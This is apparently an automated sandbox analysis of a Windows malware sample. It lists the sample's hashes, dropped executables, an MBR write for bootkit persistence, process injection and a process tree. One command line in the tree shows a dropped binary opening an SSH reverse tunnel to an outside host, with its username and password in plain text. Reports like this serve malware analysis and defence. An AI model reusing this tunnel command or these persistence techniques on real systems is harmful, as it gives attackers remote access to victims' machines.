258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d

Analysis

max time kernel
150s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
19/09/2022, 16:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe
Size

727KB
MD5

fced0ba13b11a53d920b02bf8fd7a1ca
SHA1

e2bba12d79fe865146e6b02f79641852cfaa4040
SHA256

258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d
SHA512

3f03383d41a88ac00485a4da6ef6ec38d794fd5243cdb0cd9ac61c6570575e726bf6560a7da922cd8af8c7f823304d0b69759f24ef43f797549e0914b030d160
SSDEEP

12288:i9UAnhPd6qmvCLAsShDHA8jgn7q8DBzYzEBODFkMOOrMzYrNvzKWOyIWWBzNc7dp:i9UAxd69K8NhDvY7quY7xPvRqWichNYa

Score

8^/10

bootkit persistence

Malware Config

Signatures

Executes dropped EXE 5 IoCs

pid	Process
1944	alg.exe
332	cssrs.exe
3804	System.exe
3508	cssrs.exe
4776	cssrs.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	alg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	cssrs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 332 set thread context of 3508	332	cssrs.exe	88
PID 3508 set thread context of 4776	3508	cssrs.exe	89

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
332	cssrs.exe
3508	cssrs.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 4992 wrote to memory of 1944	4992	258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe	83
PID 4992 wrote to memory of 1944	4992	258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe	83
PID 4992 wrote to memory of 1944	4992	258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe	83
PID 1944 wrote to memory of 332	1944	alg.exe	85
PID 1944 wrote to memory of 332	1944	alg.exe	85
PID 1944 wrote to memory of 332	1944	alg.exe	85
PID 1944 wrote to memory of 3804	1944	alg.exe	86
PID 1944 wrote to memory of 3804	1944	alg.exe	86
PID 1944 wrote to memory of 3804	1944	alg.exe	86
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 332 wrote to memory of 3508	332	cssrs.exe	88
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89
PID 3508 wrote to memory of 4776	3508	cssrs.exe	89

C:\Users\Admin\AppData\Local\Temp\258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe
"C:\Users\Admin\AppData\Local\Temp\258df4e7dc5b41d972db3d589456130f71a6a26f44cdb5660d28c10f9bdc606d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4992
- C:\Win.Msi\alg.exe
  "C:\Win.Msi\alg.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1944
- - C:\Win.Msi\cssrs.exe
    "C:\Win.Msi\cssrs.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:332
  - - C:\Win.Msi\cssrs.exe
      "C:\Win.Msi\cssrs.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3508
    - - C:\Win.Msi\cssrs.exe
        
        "C:\Win.Msi\cssrs.exe"
        5⤵
        Executes dropped EXE
        
        PID:4776
- - C:\Win.Msi\System.exe
    "C:\Win.Msi\System.exe" -ssh -R 40607:127.0.0.1:2103 pltma.cechire.com -l pltma -pw pulea
    3⤵
    - Executes dropped EXE
    PID:3804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Win.Msi\3proxy.cfg

Filesize
132B

MD5
8342b622ca3ce4dc24dfe9d1d73aa231

SHA1
88ddbd474304e28a13f0b8b645074456cc78641b

SHA256
d5f2ef03c5a3d9affc5e7c0edca0ca887c5b15fa18a67e15b7982c2d8a741f55

SHA512
0f632515d0638110da4028553395495031b7405c1d8eb02b50312e076c5c8f3449ec6331559e43829fc0dbfbdee696448d04694e4e47ef985f580f9d4a093697

Download Submit
C:\Win.Msi\DiskDoctor.lnk

Filesize
494B

MD5
cfa161b8d3e17c3d1f40d21feb22d2be

SHA1
98e4adc779744f15d0b225f550b6d69e5fcadfff

SHA256
6b08344314ce52545ade0984a5b85ea22904b9bcf207fbd0ff645d360909e6b4

SHA512
c9a04ac1f7bf6ff71adc60fc2cadd85ac5f2b4bb8bd54bf46e962149a61f921562c7552ffbc3428fe706b573f0432dccf8f739c3719d8f4f577576f5fb3cac4c

Download Submit
C:\Win.Msi\System.exe

Filesize
323KB

MD5
f4bf5c28bed38e31c143abfb9bebb6d5

SHA1
015f3e7ce4ff406f712b4ee1c893edfaa9276259

SHA256
d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

SHA512
72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

Download Submit
C:\Win.Msi\System.exe

Filesize
323KB

MD5
f4bf5c28bed38e31c143abfb9bebb6d5

SHA1
015f3e7ce4ff406f712b4ee1c893edfaa9276259

SHA256
d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

SHA512
72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

Download Submit
C:\Win.Msi\alg.exe

Filesize
180KB

MD5
1a55cd295fc2d2be1a89597950bbdb7d

SHA1
4216613c9e1f958046276e25c9c3a81306ef725a

SHA256
a84ca9970ca5426da375154717bc11d2535912968492f6e36de29775a10d7be3

SHA512
c09aea66731bbb51afa8482352f8925ba11e5553fbe9980aaa3d132f52296a5de04f4c668d7fe4de114f22be318789093332d8ea0944800093ca685c40b8f3c1

Download Submit
C:\Win.Msi\alg.exe

Filesize
180KB

MD5
1a55cd295fc2d2be1a89597950bbdb7d

SHA1
4216613c9e1f958046276e25c9c3a81306ef725a

SHA256
a84ca9970ca5426da375154717bc11d2535912968492f6e36de29775a10d7be3

SHA512
c09aea66731bbb51afa8482352f8925ba11e5553fbe9980aaa3d132f52296a5de04f4c668d7fe4de114f22be318789093332d8ea0944800093ca685c40b8f3c1

Download Submit
C:\Win.Msi\cssrs.exe

Filesize
292KB

MD5
c718a13084ad4953f6c532408e43795f

SHA1
ccb6b00cf31099b04c0b5b146965fd2a639fcb03

SHA256
408f43fe89254ee68c042340f129112eeaa2260de03c7fbc91ff65529f6d3493

SHA512
11b738d3fe8e4dac0c7db58fcf672a5c8654debe47f17bf1ff070f458842efce97be4803aac8fc938984f4b6e0d3f5a888c39cf68fc84d01dbf46684c2844c0b

Download Submit
C:\Win.Msi\cssrs.exe

Filesize
292KB

MD5
c718a13084ad4953f6c532408e43795f

SHA1
ccb6b00cf31099b04c0b5b146965fd2a639fcb03

SHA256
408f43fe89254ee68c042340f129112eeaa2260de03c7fbc91ff65529f6d3493

SHA512
11b738d3fe8e4dac0c7db58fcf672a5c8654debe47f17bf1ff070f458842efce97be4803aac8fc938984f4b6e0d3f5a888c39cf68fc84d01dbf46684c2844c0b

Download Submit
C:\Win.Msi\cssrs.exe

Filesize
292KB

MD5
c718a13084ad4953f6c532408e43795f

SHA1
ccb6b00cf31099b04c0b5b146965fd2a639fcb03

SHA256
408f43fe89254ee68c042340f129112eeaa2260de03c7fbc91ff65529f6d3493

SHA512
11b738d3fe8e4dac0c7db58fcf672a5c8654debe47f17bf1ff070f458842efce97be4803aac8fc938984f4b6e0d3f5a888c39cf68fc84d01dbf46684c2844c0b

Download Submit
C:\Win.Msi\cssrs.exe

Filesize
292KB

MD5
c718a13084ad4953f6c532408e43795f

SHA1
ccb6b00cf31099b04c0b5b146965fd2a639fcb03

SHA256
408f43fe89254ee68c042340f129112eeaa2260de03c7fbc91ff65529f6d3493

SHA512
11b738d3fe8e4dac0c7db58fcf672a5c8654debe47f17bf1ff070f458842efce97be4803aac8fc938984f4b6e0d3f5a888c39cf68fc84d01dbf46684c2844c0b

Download Submit
memory/3508-145-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3508-156-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/4776-151-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/4776-154-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/4776-157-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/4776-158-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download